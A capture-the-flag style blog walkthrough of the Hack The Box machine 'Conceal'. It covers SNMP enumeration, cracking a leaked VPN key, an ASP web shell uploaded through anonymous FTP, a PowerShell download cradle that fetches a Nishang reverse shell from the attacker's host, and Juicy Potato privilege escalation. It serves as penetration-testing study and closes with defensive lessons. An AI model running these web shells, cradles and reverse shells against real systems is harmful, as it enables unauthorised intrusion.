This is the 40th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here.
Let’s get started!
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.116 All
- All: Runs all the scans consecutively.
We get back the following result.
root@kali:~/Desktop/htb/conceal# nmapAutomator.sh 10.10.10.116 AllRunning all scans on 10.10.10.116Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:19 EST Nmap done: 1 IP address (1 host up) scanned in 101.60 seconds---------------------Starting Nmap Basic Scan---------------------No ports in quick scan.. Skipping!----------------------Starting Nmap UDP Scan----------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:20 EST Nmap scan report for 10.10.10.116 Host is up (0.051s latency). Not shown: 999 open|filtered ports PORT STATE SERVICE 500/udp open isakmpNmap done: 1 IP address (1 host up) scanned in 188.61 secondsMaking a script scan on UDP ports: 500Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST /usr/local/bin/nmapAutomator.sh: line 164: 1941 Segmentation fault $nmapType -sCVU --script vulners --script-args mincvss=7.0 -p$(echo "${udpPorts}") -oN nmap/UDP_"$1".nmap "$1"---------------------Starting Nmap Full Scan----------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 23:23 EST Initiating Parallel DNS resolution of 1 host. at 23:23 Completed Parallel DNS resolution of 1 host. at 23:23, 0.02s elapsed Initiating SYN Stealth Scan at 23:23 Scanning 10.10.10.116 [65535 ports] Nmap scan report for 10.10.10.116 Host is up. All 65535 scanned ports on 10.10.10.116 are filteredRead data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 27315.03 seconds Raw packets sent: 131070 (5.767MB) | Rcvd: 2 (168B)Making a script scan on all ports Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 06:59 EST Error #486: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-" QUITTING!---------------------Finished all Nmap scans---------------------
We have one open port.
- Port 500: running isakmp
Before we move on to enumeration, let’s make some mental notes about the scan results.
- I’m not familiar with the service that is running on port 500. A quick google search tells us that it is the Internet Security Association and Key Management Protocol( ISAKMP) which is commonly called Internet Key Exchange (IKE). A lot of the documentation references configuring IPsec and ISAKMP standards to build VPNs.
- So there are probably other ports that are open, however, we won’t be able to see them before we establish that VPN connection. In order to do that, we need some kind of key for authentication and since this is an HTB box, we have to find this key somewhere. So what we’ll do is rerun all the nmap scans to see if we missed any ports the first time around.
Enumeration
Rerunning the UDP scan does give us an extra port.
root@kali:~# nmap -vvv -sU -sV 10.10.10.116
....
Discovered open port 161/udp on 10.10.10.116
Port 161 is open. This usually runs the SNMP service. Let’s check that using nmap.
nmap -p 161 -sU -sC -sV 10.10.10.116
- -p: port
- -sU: UDP scan
- -sC: run default scripts
- -sV: version detection
We get back the following result.
The port is running SNMP version 1 and was able to query the service using the default “public” community string. We see that there are a bunch of ports that are open including FTP, HTTP and SMB. We won’t get access to these ports until we establish a secure connection.
For now, we can only interact with the SNMP and ISAKMP ports. Let’s first query SNMP for any sensitive information.
snmpwalk -c public -v 1 10.10.10.116 > snmp-public.txt
- -c: community string
- -v: SNMP version
We get back the following result.
root@kali:~/Desktop/htb/conceal# cat snmp-public.txt iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)" iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1 iso.3.6.1.2.1.1.3.0 = Timeticks: (305519) 0:50:55.19 iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43" iso.3.6.1.2.1.1.5.0 = STRING: "Conceal" iso.3.6.1.2.1.1.6.0 = "" iso.3.6.1.2.1.1.7.0 = INTEGER: 76 iso.3.6.1.2.1.2.1.0 = INTEGER: 15 iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
It leaks the IKE VPN password hash!
root@kali:~# echo -n 9C8B1A372B1878851BE2C097031B6E43 | wc -c
32
This looks like an MD5 hash. Let’s use the CrackStation to crack it.
Now that we have a plaintext password, let’s try and establish a connection to the VPN.
First run ike-scan to determine the IKE implementation and configuration that the host is using.
ike-scan -M 10.10.10.116
- -M: multiline
We get back the following result.
Next, we’ll use strongswan to establish the IPsec connection. This does not come preinstalled on Kali. To install it, run the following command.
apt-get install strongswan
We have to make changes to two files: ipsec.secrets and ipsec.conf.
In the /etc/ipsec.secrets, add the following entry.
10.10.14.7 10.10.10.116 : PSK "Dudecake1!"
In the /etc/ipsec.conf, add the following entry.
conn conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.14.7
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotoport=tcp
Then run the following command to establish the connection.
root@kali:~# ipsec up concealgenerating QUICK_MODE request 1899279807 [ HASH SA No ID ID ] sending packet: from 10.10.14.7[500] to 10.10.10.116[500] (196 bytes) received packet: from 10.10.10.116[500] to 10.10.14.7[500] (188 bytes) parsed QUICK_MODE response 1899279807 [ HASH SA No ID ID ] selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ detected rekeying of CHILD_SA conceal{32} CHILD_SA conceal{33} established with SPIs cea2f2d0_i fbdc1ee6_o and TS 10.10.14.7/32 === 10.10.10.116/32[tcp] generating QUICK_MODE request 1899279807 [ HASH ] connection 'conceal' established successfully
Perfect, the connection was established successfully. Now let’s try and run an nmap scan.
root@kali:~/Desktop/htb/conceal# nmap 10.10.10.116 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:24 EST Nmap scan report for 10.10.10.116 Host is up (0.047s latency). All 1000 scanned ports on 10.10.10.116 are filteredNmap done: 1 IP address (1 host up) scanned in 49.03 seconds
The default TCP SYN scan (-sS) does not seem to work, but a TCP connect scan does.
root@kali:~/Desktop/htb/conceal# nmap -sT 10.10.10.116 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 00:26 EST Nmap scan report for 10.10.10.116 Host is up (0.042s latency). Not shown: 995 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-dsNmap done: 1 IP address (1 host up) scanned in 2.65 seconds
I have no idea why you would need a TCP connect scan for it to work. However, in the interest of moving forward, let’s run a more comprehensive TCP connect scan.
root@kali:~/Desktop/htb/conceal# nmap -sC -sV -sT -o nmap-vpn.text 10.10.10.116Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 20:39 EST Nmap scan report for 10.10.10.116 Host is up (0.041s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results: |_clock-skew: 2m18s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-28T01:41:47 |_ start_date: 2020-02-27T01:56:42Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.89 seconds
More Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.
We get the default Windows Microsoft IIS welcome page. The page source doesn’t contain any sensitive information.
Next, run gobuster to enumerate directories/files.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.116 -o gobuster.txt
- dir: directory mode
- -w: wordlist
- -u: URL
- -o: output file
We get back the following result.
Visit the directory in the browser.
It doesn’t contain anything. Let’s see if we can upload files through FTP.
Port 21 FTP
The nmap scan showed anonymous login is allowed.
root@kali:~/Desktop/htb/conceal/upload# ftp 10.10.10.116Connected to 10.10.10.116. 220 Microsoft FTP Service Name (10.10.10.116:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. ftp>
Let’s test if we’re allowed to upload files. Create a test.txt file on the attack machine.
echo "hello" > test.txt
Upload the test.txt file on the FTP server.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (78.5740 kB/s)
The upload was successful. Let’s see if we can execute the file from the /upload directory on the web server.
Perfect! According to the nmap scan, this is a Microsoft IIS server version 10, so it should be able to execute ASP and ASPX code. Let’s test this out on the web server.
Create a test.aspx file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
We get an HTTP error saying that the file can’t be served because of the extension configuration. So we can’t upload ASPX files. Next, let’s try an ASP file.
Create a test.asp file on the attack machine and upload it on the FTP server in the same way we did before. Then execute the file from the /upload directory on the web server.
Perfect, it does execute ASP code! We’ll use this to gain an initial foothold on the system.
Initial Foothold
Create a cmd.asp file on the attack machine that contains the following simple web shell.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
The above code executes the whoami command and outputs it on the screen. Upload the cmd.asp file on the FTP server and view it on the browser.
We have code execution! Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Next, change the cmd.asp file to download the PowerShell script and execute it.
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Start up a python server in the directory that the shell script resides in.
python -m SimpleHTTPServer 5555
Upload the cmd.asp file on the FTP server and view it on the browser.
We get a shell! Grab the user.txt flag.
Privilege Escalation
Run the systeminfo command.
PS C:\Users\Destitute\Desktop> systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 27/02/2020, 01:56:19
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,154 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,213 MB
Virtual Memory: In Use: 986 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::4e1:f9b6:e5da:2f16
[03]: dead:beef::71d9:f571:4c90:5dc7
[04]: dead:beef::18b2:9ba4:e093:98b9
[05]: dead:beef::4e1:f9b6:e5da:2f16
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We’re on a Microsoft Windows 10 Enterprise 64-bit OS. Let’s first check the system privileges that are enabled for this user.
SetImpersonatePrivilege is enabled so we’re very likely to get SYSTEM using Juicy Potato. Users running the SQL server service or the IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato exploits the way Microsoft handles tokens in order to escalate local privileges to SYSTEM.
Let’s test it out. Grab the Juicy Potato executable from here and transfer it to the target machine using the following command.
(new-object net.webclient).downloadfile('http://10.10.14.7:5555/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\jp.exe')
Run the executable file to view the arguments it takes.
It requires 3 mandatory arguments.
- -t: Create process call. For this option we’ll use * to test both options.
- -p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine.
- -l: COM server listen port. This can be anything. We’ll use 4444.
First copy the Invoke-PowerShellTcp.ps1 script once again into your current directory.
cp ../../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell-2.ps1
Add the following line to the end of the script with the attack configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
When called, this sends a reverse shell back to our attack machine on port 6666.
Next, create a shell.bat file that downloads the above shell-2.ps1 PowerShell script and runs it.
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell-2.ps1')
Then download the shell.bat file on the target machine.
(new-object net.webclient).downloadfile('http://10.10.14.7:5555/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')
Setup a listener on the attack machine to receive the reverse shell.
nc -nlvp 6666
Then run the Juicy Potato executable. This should attempt to get a token that impersonates SYSTEM and then run our shell.bat file with elevated privileges.
PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
COM -> recv failed with error: 10038
It fails to escalate privileges with the default CLSID. We can get the list of CLSIDs on our system using this script. However, let’s first manually try one of the Windows 10 Enterprise CLSIDs available on the Juicy Potato github repo.
Rerun the Juicy Potato executable with the above specific CLSID.
PS C:\Users\Destitute\Desktop> ./jp.exe -p shell.bat -l 4444 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}" Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 4444 ...... [+] authresult 0 {e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM[+] CreateProcessWithTokenW OK
We get a shell back with SYSTEM privileges!
root@kali:~# nc -nlvp 6666 listening on [any] 6666 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.116] 49720 Windows PowerShell running as user CONCEAL$ on CONCEAL Copyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\Windows\system32>whoami nt authority\system
Grab the root.txt flag.
Lessons Learned
To gain an initial foothold on the box we exploited three vulnerabilities.
- Outdated version of SNMP and the use of default SNMP community string. The community string essentially acts as a password to gain access to the service. Using the default “public” string, we were able to query SNMP for the IKE VPN hashed password. The administrator should have instead used SNMPv3 since it’s the only version that provides strong authentication and data encryption. If it is necessary that version 1 be used, the administrator should have changed the community string to one that is not easily guessable.
- Weak authentication credentials. The shared secret used to establish a secure connection was cracked in a matter of seconds using an online password cracker. The administrator should have either used a stronger shared key that is difficult to crack or considered using asymmetric encryption.
- Insecure configuration of FTP server that allowed anonymous login and file upload. The administrator should have disabled anonymous access to the FTP server. If anonymous access was necessary, the administrator should have configured the FTP server to only allow downloads. This way we would not have been able to upload a reverse shell.
To escalate privileges we didn’t necessarily exploit a vulnerability but an intended design of how Microsoft handles tokens. So there’s really not much to do there but put extra protections in place for these sensitive accounts.
Conclusion
40 machines down, 6 more to go!
Author : Puckiestyle